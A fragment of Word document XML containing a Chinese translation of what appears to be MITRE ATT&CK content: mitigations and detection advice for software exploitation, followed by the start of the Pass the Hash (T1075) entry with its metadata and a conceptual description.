          <w:p w14:paraId="4ADBF817" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="006134E6" w:rsidRDefault="00CC5590" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:hyperlink r:id="rId199" w:history="1">
              <w:r w:rsidR="00A0413E" w:rsidRPr="006134E6">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:rFonts w:hint="eastAsia"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>漏洞利用防护</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7047" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="73C97361" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="006134E6" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="006134E6">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>可用</w:t>
            </w:r>
            <w:r w:rsidRPr="006134E6">
              <w:t>安全应用</w:t>
            </w:r>
            <w:r w:rsidRPr="006134E6">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，例如</w:t>
            </w:r>
            <w:r w:rsidRPr="006134E6">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Windows Defender</w:t>
            </w:r>
            <w:r w:rsidRPr="006134E6">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>漏洞利用</w:t>
            </w:r>
            <w:r w:rsidRPr="006134E6">
              <w:t>防护（</w:t>
            </w:r>
            <w:r w:rsidRPr="006134E6">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>WDEG</w:t>
            </w:r>
            <w:r w:rsidRPr="006134E6">
              <w:t>）</w:t>
            </w:r>
            <w:r w:rsidRPr="006134E6">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>和增强缓和体验工具包（</w:t>
            </w:r>
            <w:r w:rsidRPr="006134E6">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>EMET</w:t>
            </w:r>
            <w:r w:rsidRPr="006134E6">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>），</w:t>
            </w:r>
            <w:r w:rsidRPr="006134E6">
              <w:t>来</w:t>
            </w:r>
            <w:r w:rsidRPr="006134E6">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>查找</w:t>
            </w:r>
            <w:r w:rsidRPr="006134E6">
              <w:t>漏洞</w:t>
            </w:r>
            <w:r w:rsidRPr="006134E6">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>攻击</w:t>
            </w:r>
            <w:r w:rsidRPr="006134E6">
              <w:t>行为</w:t>
            </w:r>
            <w:r w:rsidRPr="006134E6">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="006134E6">
              <w:t>从而缓解某些漏洞</w:t>
            </w:r>
            <w:r w:rsidRPr="006134E6">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>攻击行为</w:t>
            </w:r>
            <w:r w:rsidRPr="006134E6">
              <w:t>的影响。</w:t>
            </w:r>
            <w:r w:rsidRPr="006134E6">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>也可</w:t>
            </w:r>
            <w:r w:rsidRPr="006134E6">
              <w:t>通过控制流完整性检查</w:t>
            </w:r>
            <w:r w:rsidRPr="006134E6">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>来</w:t>
            </w:r>
            <w:r w:rsidRPr="006134E6">
              <w:t>识别和阻止软件攻击。</w:t>
            </w:r>
            <w:r w:rsidRPr="006134E6">
              <w:rPr>
                <w:rStyle w:val="high-light-bg4"/>
              </w:rPr>
              <w:t>许多保护</w:t>
            </w:r>
            <w:r w:rsidRPr="006134E6">
              <w:rPr>
                <w:rStyle w:val="high-light-bg4"/>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>措施</w:t>
            </w:r>
            <w:r w:rsidRPr="006134E6">
              <w:rPr>
                <w:rStyle w:val="high-light-bg4"/>
              </w:rPr>
              <w:t>依赖于体系结构和目标应用二进制文件的兼容性</w:t>
            </w:r>
            <w:r w:rsidRPr="006134E6">
              <w:rPr>
                <w:rStyle w:val="high-light-bg4"/>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="006134E6">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>可能不适用于所有目标软件或服务。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A0413E" w:rsidRPr="006134E6" w14:paraId="35FC8349" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="465"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2689" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="789B46D6" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="006134E6" w:rsidRDefault="00CC5590" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:hyperlink r:id="rId200" w:history="1">
              <w:r w:rsidR="00A0413E" w:rsidRPr="006134E6">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:rFonts w:hint="eastAsia"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>网络分区</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7047" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="77F9674A" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="006134E6" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="006134E6">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>适当地细分网络和系统，减少对关键系统和服务的访问。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A0413E" w:rsidRPr="006134E6" w14:paraId="0CEA632B" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="465"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2689" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="334555AC" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="006134E6" w:rsidRDefault="00CC5590" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:hyperlink r:id="rId201" w:history="1">
              <w:r w:rsidR="00A0413E" w:rsidRPr="006134E6">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:rFonts w:hint="eastAsia"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>特权账号管理</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7047" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="05F46C46" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="006134E6" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="006134E6">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>将</w:t>
            </w:r>
            <w:r w:rsidRPr="006134E6">
              <w:t>服务账号的权限和访问限制在最小范围，</w:t>
            </w:r>
            <w:r w:rsidRPr="006134E6">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>尽量降低</w:t>
            </w:r>
            <w:r w:rsidRPr="006134E6">
              <w:t>漏洞攻击的影响</w:t>
            </w:r>
            <w:r w:rsidRPr="006134E6">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A0413E" w:rsidRPr="006134E6" w14:paraId="324DE1C6" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="465"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2689" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="16EB22C5" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="006134E6" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="006134E6">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>威胁</w:t>
            </w:r>
            <w:r w:rsidRPr="006134E6">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>情报程序</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7047" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="55A1913E" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="006134E6" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="006134E6">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>开发一个强大的网络威胁情报能力，用来确定哪些类型和级别的威胁可能会针对特定组织实施软件攻击和零日漏洞攻击。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A0413E" w:rsidRPr="006134E6" w14:paraId="5B3296D2" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="465"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2689" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="70DB3222" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="006134E6" w:rsidRDefault="00CC5590" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:hyperlink r:id="rId202" w:history="1">
              <w:r w:rsidR="00A0413E" w:rsidRPr="006134E6">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:rFonts w:hint="eastAsia"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>软件升级</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7047" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="241F2DF3" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="006134E6" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="006134E6">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>对内部企业端点和服务器通过补丁管理来定期更新软件。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A0413E" w:rsidRPr="006134E6" w14:paraId="7B996C26" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="465"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2689" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3ED0E46F" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="006134E6" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="006134E6">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>漏洞</w:t>
            </w:r>
            <w:r w:rsidRPr="006134E6">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>扫描</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7047" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6ED8509C" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="006134E6" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="006134E6">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>定期扫描内部网络上的可用服务，识别新服务以及可能易受攻击的服务。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="47D6FB32" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D6F7DB7" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59369312" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00CC0E52" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>软件利用检测可能很困难，</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>具体取决于</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可用的工具。软件攻击可能并不会总是成功，或者可能导致被攻击的进程变得不稳定或崩溃。</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>还要在端点系统上查</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>找</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>能表明</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>成功的行为，例如进程的异常行为</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，包括写入</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>磁盘</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>可疑文件，</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过进程</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>插入来试图掩盖执行</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>证据，发现</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>证据</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，以及</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>表明</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>其它工具传输到系统的异常网络流量。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DB4FF38" w14:textId="53CA481F" w:rsidR="00A0413E" w:rsidRPr="0096095B" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0096095B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>哈希传递</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A0413E" w:rsidRPr="00FE38DE" w14:paraId="20D61A74" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="43AFCD7A" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00FE38DE" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00FE38DE">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="00FE38DE">
              <w:t>T1075</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4A6A9BC2" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00FE38DE" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00FE38DE">
              <w:t>技术：横向移动</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="76E64487" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00FE38DE" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00FE38DE">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00FE38DE">
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7ADFF430" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00FE38DE" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00FE38DE">
              <w:t>系统要求：</w:t>
            </w:r>
            <w:r w:rsidRPr="00FE38DE">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>需要</w:t>
            </w:r>
            <w:r w:rsidRPr="00FE38DE">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Microsoft Windows</w:t>
            </w:r>
            <w:r w:rsidRPr="00FE38DE">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>作为目标系统</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7CA7CD18" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00FE38DE" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00FE38DE">
              <w:lastRenderedPageBreak/>
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="00FE38DE">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>认证日志</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4C741511" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00FE38DE" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00FE38DE">
              <w:t>贡献者：</w:t>
            </w:r>
            <w:r w:rsidRPr="00FE38DE">
              <w:t>Travis Smith</w:t>
            </w:r>
            <w:r w:rsidRPr="00FE38DE">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00FE38DE">
              <w:t>Tripwire</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1C59170D" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00FE38DE" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00FE38DE">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00FE38DE">
              <w:t>1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="50C1879E" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00BD4F24" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B7C8A12" w14:textId="6599E2C3" w:rsidR="00A0413E" w:rsidRPr="0012481B" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r w:rsidRPr="0012481B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>认证哈希传递（</w:t>
      </w:r>
      <w:r w:rsidRPr="0012481B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidRPr="0012481B">
        <w:t>tH</w:t>
      </w:r>
      <w:r w:rsidRPr="0012481B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）是一种不</w:t>
      </w:r>
      <w:r w:rsidRPr="0012481B">
        <w:t>访问用户明文</w:t>
      </w:r>
      <w:r w:rsidRPr="0012481B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>密码</w:t>
      </w:r>
      <w:r w:rsidRPr="0012481B">
        <w:t>而</w:t>
      </w:r>
      <w:r w:rsidRPr="0012481B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对</w:t>
      </w:r>
      <w:r w:rsidRPr="0012481B">
        <w:t>用户进行身份认证</w:t>
      </w:r>
      <w:r w:rsidRPr="0012481B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="0012481B">
        <w:t>方法。</w:t>
      </w:r>
      <w:r w:rsidRPr="0012481B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这种方法绕过需要明文密码</w:t>
      </w:r>
      <w:r w:rsidRPr="0012481B">
        <w:t>的步骤</w:t>
      </w:r>
      <w:r w:rsidRPr="0012481B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，直接用密码</w:t>
      </w:r>
      <w:r w:rsidRPr="0012481B">
        <w:t>哈希来进行身份认证</w:t>
      </w:r>
      <w:r w:rsidRPr="0012481B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。在使用</w:t>
      </w:r>
      <w:r w:rsidRPr="0012481B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidRPr="0012481B">
        <w:t>tH</w:t>
      </w:r>
      <w:r w:rsidRPr="0012481B">
        <w:t>技术</w:t>
      </w:r>
      <w:r w:rsidRPr="0012481B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>时</w:t>
      </w:r>
      <w:r w:rsidRPr="0012481B">
        <w:t>，可通过</w:t>
      </w:r>
      <w:r w:rsidR="006508E9">
        <w:t>凭据访问</w:t>
      </w:r>
      <w:r w:rsidRPr="0012481B">
        <w:t>技术获得正在使用账号的有效密码哈希。</w:t>
      </w:r>
      <w:r w:rsidRPr="0012481B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidRPr="0012481B">
        <w:t>tH</w:t>
      </w:r>
      <w:r w:rsidRPr="0012481B">
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidRPr="0012481B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>捕捉的哈希来认证该用户身份。一旦身份认证</w:t>
      </w:r>
      <w:r w:rsidRPr="0012481B">
        <w:t>通过</w:t>
      </w:r>
      <w:r w:rsidRPr="0012481B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="0012481B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PtH</w:t>
      </w:r>
      <w:r w:rsidRPr="0012481B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可用于在本地或远程系统上执行操作。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C9ADED" w14:textId="60C0B557" w:rsidR="00A0413E" w:rsidRPr="0012481B" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="scite-citeref-number"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0012481B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>已安装</w:t>
      </w:r>
      <w:r w:rsidRPr="0012481B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>KB2871997</w:t>
      </w:r>
      <w:r w:rsidRPr="0012481B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>补丁的</w:t>
      </w:r>
      <w:r w:rsidRPr="0012481B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows 7</w:t>
      </w:r>
      <w:r w:rsidRPr="0012481B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>及更高版本需要有效域用户</w:t>
      </w:r>
      <w:r w:rsidR="006508E9">
        <w:t>凭据</w:t>
      </w:r>
      <w:r w:rsidRPr="0012481B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r w:rsidRPr="0012481B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>RID 500</w:t>
      </w:r>
      <w:r w:rsidRPr="0012481B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>管理员哈希。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B2251B0" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2547"/>
        <w:gridCol w:w="7189"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A0413E" w:rsidRPr="0012481B" w14:paraId="29FFA6D4" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="353"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2547" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
